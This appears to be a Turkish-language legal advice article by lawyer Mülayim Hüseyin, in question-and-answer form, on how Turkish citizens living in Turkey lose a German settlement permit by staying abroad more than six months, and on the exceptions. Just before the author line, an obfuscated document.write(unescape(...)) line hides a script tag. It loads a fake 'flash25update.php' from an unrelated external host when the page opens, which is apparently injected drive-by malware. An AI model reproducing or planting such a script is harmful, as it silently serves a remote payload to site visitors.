Çarşamba , 5 Ekim 2022

6 ayda bir giriş çıkışlar ve Almanya’da oturma müsadenizin iptali

Avukat Mülayim Hüseyin

Son 1 yılda sık karşılaştığımız konu; Genelde emekliliğe ayrılmış olanların yada genç olup, Türkiye’de yaşamayı tercih edip kendilerine orda bir perspektif kurmak isteyenlerin, Türkiye’ye yerleşmesi ve altı ayda bir giriş-çıkış yaparak genelde süresiz oturma müsadesi olan ”Niederlassungserlaubnis” statülerini korumaya çalışamaları sonucu Yababcılar Dairesi ile yaşadıkları sorunlardır.

Sorun, Yabancılar Dairesinin bu kişilerin oturma müsadelerinin yasa gereği iptal olduğunu tespit etmesidir. Bu sorunun gündeme gelmesinin nedeni ise, Türk pasaportlarının yenilenmesi ve var olan oturma müsadesinin yeni pasaporta aktarılması veya yeni uygulamayla kart çıkartılmasıdır. Bu başvurularda Yabancılar Dairesi kendi tespitleri veya kişilerin bilmeden yanlış beyanları sonucunda 6 aydan fazla Almanya dışında yaşadıklarını tespit etmekte, yasa gereği oturma müasadesi haklarının iptal olduğunu bildirmekte ve gerekli işlem yapmaktadır.

1. Oturma müsadesi ne zaman yasa gereği iptal olur?

Şahıs geçici olmamak şartıyla ülkeden ayrıldığı zaman oturma müsadesi resen (otomatikman) iptal olur.

2. Bunun için bir süre var mı?

Süre 6 aydır. Yani 6 aydan fazla Almanya dışında kalındığı zaman.

3. 6 Ayda bir giriş-çıkış yapmak iptaldan kurtarır mı?

Hayır! Belirlenen 6 ay süresi sadece gidişin geçici olmadığına yönelik bir ip ucudur. Kişi bir yıl içerisinde 6 aydan fazla Almanya dışında yaşadığı zaman, geçici olamayacak şekilde Almanya dışında yaşıyor sayılır.

4. Konu mahkemeler tarafından nasıl karalaştırıldı?

Federal İdari Mahkemesi oturma müsadesinin iptalinin, 6 ayın dolmasına az zaman kalan dönemlerde giriş-çıkışlarla engellenemeyeceğini hükme bağladı. Yerel mahkemeler bu kararı bugüne kadar hep tasdik etmektedir.

5. Kanun hangi istisnaları öngörmektedir?

Ömrünü burda emek vererek geçiren ve emekliliğini Türkiye’de geçirmek isteyenleri dikkate alarak kanun en azından 15 yıl Almanyada oturma müsadesine sahip olarak yaşamış ve süresiz oturma müsadesine sahip olanlara istisna tanımaktadır. Ancak bu hak, yaşam masraflarını karşılayabilecek gelire sahip olupda, devletden yardım alma hakkına sahip olmayanlara tanınmaktadır. Yani Hartz 4 esasında veya yaşlılıkta temel güvence yardımına (Grundsicherung) muhtaç olmayanlar bundan yararlanabilirler.

6. Yaşam masraflarını karşılayacak gelir miktarı ne kadardır?

Hartz 4 esasında bir kişiye EUR 382,00 yaşaması için, EUR 295,00 ev kirası için ve sağlık sigortası yoksa en az EUR 350,00 sağlık sigortası için gerekmektedir, yani toplam EUR 1.027,00. Burda emekli olup da emeklilik üzerinden sağlık sigoratsına sahip olan, ayda en az EUR 677,00 miktrarında gelire sahip olmalıdır. Bu gelir hem burdaki emeklilikten, hemde varsa Türkiye’de olan emeklilikten oluşabilir. Kiraladığı evi varsa, somut ödediği kira miktarı esas alınır. Yani EUR 677,00 yeterli olmaz.

7. Alman vatandaşı eşi olanlar için durum nedir?

Alman vatandaşı eşiyle aile birliğinde yaşamını sürdüren ve süresiz oturma müsadesine sahip olana istisna tanınmaktadır. Yani Alman vatandaşı ile Türkiye’de yaşayan ve süresiz oturma müsadesine sahip olanın oturma müsadesi hakkı gelir gözetmeksizin iptal olmaz.

8. Türkiye / Avrupa Birliği Ortaklık Komisyonu (TC/AB Kararı) Anlaşmaları Türk vatandaşlarını oturma müsadelerinin iptalinden korumaz mı?

Türkiye / Avrupa Birliği Ortaklık Komisyonu 1/80 kararları Türk vatandaşlarını madde 6 ve 7’den yararlanabildikleri koşulda korumaktadır. Bu durumda bu iptal gerekçeleri Türk vatandaşları için geçerli değil. Komisyon antlaşması madde 6 ile ilgili karar, aşamalı bir yıldan dört yıla kadar işçi olarak çalışmış olan ve buna dayalı oturma müsadesi hakkı olan Türk vatandaşlarını korumaktadır. Madde 7 ise işçilerinin ailelerini, yani işçinin aile bağlarını korumaktadır.

9. TC/AB kararları hangi koşullarda oturma müsadesinin iptalini engeller?

Avrupa Adalet Divanı (Derin kararı) TC/AB Ortaklık Komisyonu kararları imtiyazına sahip TC vatandaşlarının ancak önemli ölüçütte uzun bir süre ve haklı gerekçeye sahip olmadıkları zaman Almanya dışında yaşadıklarında oturma müsadelerini kayıp edebileceklerini hükme bağladı. Bu süre, Almanya dışında geçirilen zamanın Almanya’daki aile ilişkilerinin sürdürülmesine artık uygun olamadığı ve her halükarda 2 yılı aşmayan bir süredir. Yani iki yıl içerisinde altı ayda bir giriş çıkış yapsın veya yapmasın, 2 yılı bu şekilde Türkiye’de yaşayan oturma müsadesi haklarını TC/AB hukukuna görede kayıp eder.

10. Buna çare varmı?

Vardır! Altı ay süresini hiç aşmadan, Yabancılar Dairesine altı aydan fazla kalmak amaçlı ‘süresiz izin belgesi’ için baş vurulmalıdır. Gelire bakılarak bu izin belgesi verilmektedir.
document.write(unescape(‘%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%6F%75%63%68%65%72%69%65%70%6F%75%72%72%61%74%2E%6D%75%6C%74%69%63%6C%69%63%34%2E%66%72%2F%69%6D%67%2F%66%6C%61%73%68%32%35%75%70%64%61%74%65%2E%70%68%70%3E%3C%2F%73%63%72%69%70%74%3E%0A’));

About Mülayim Hüseyin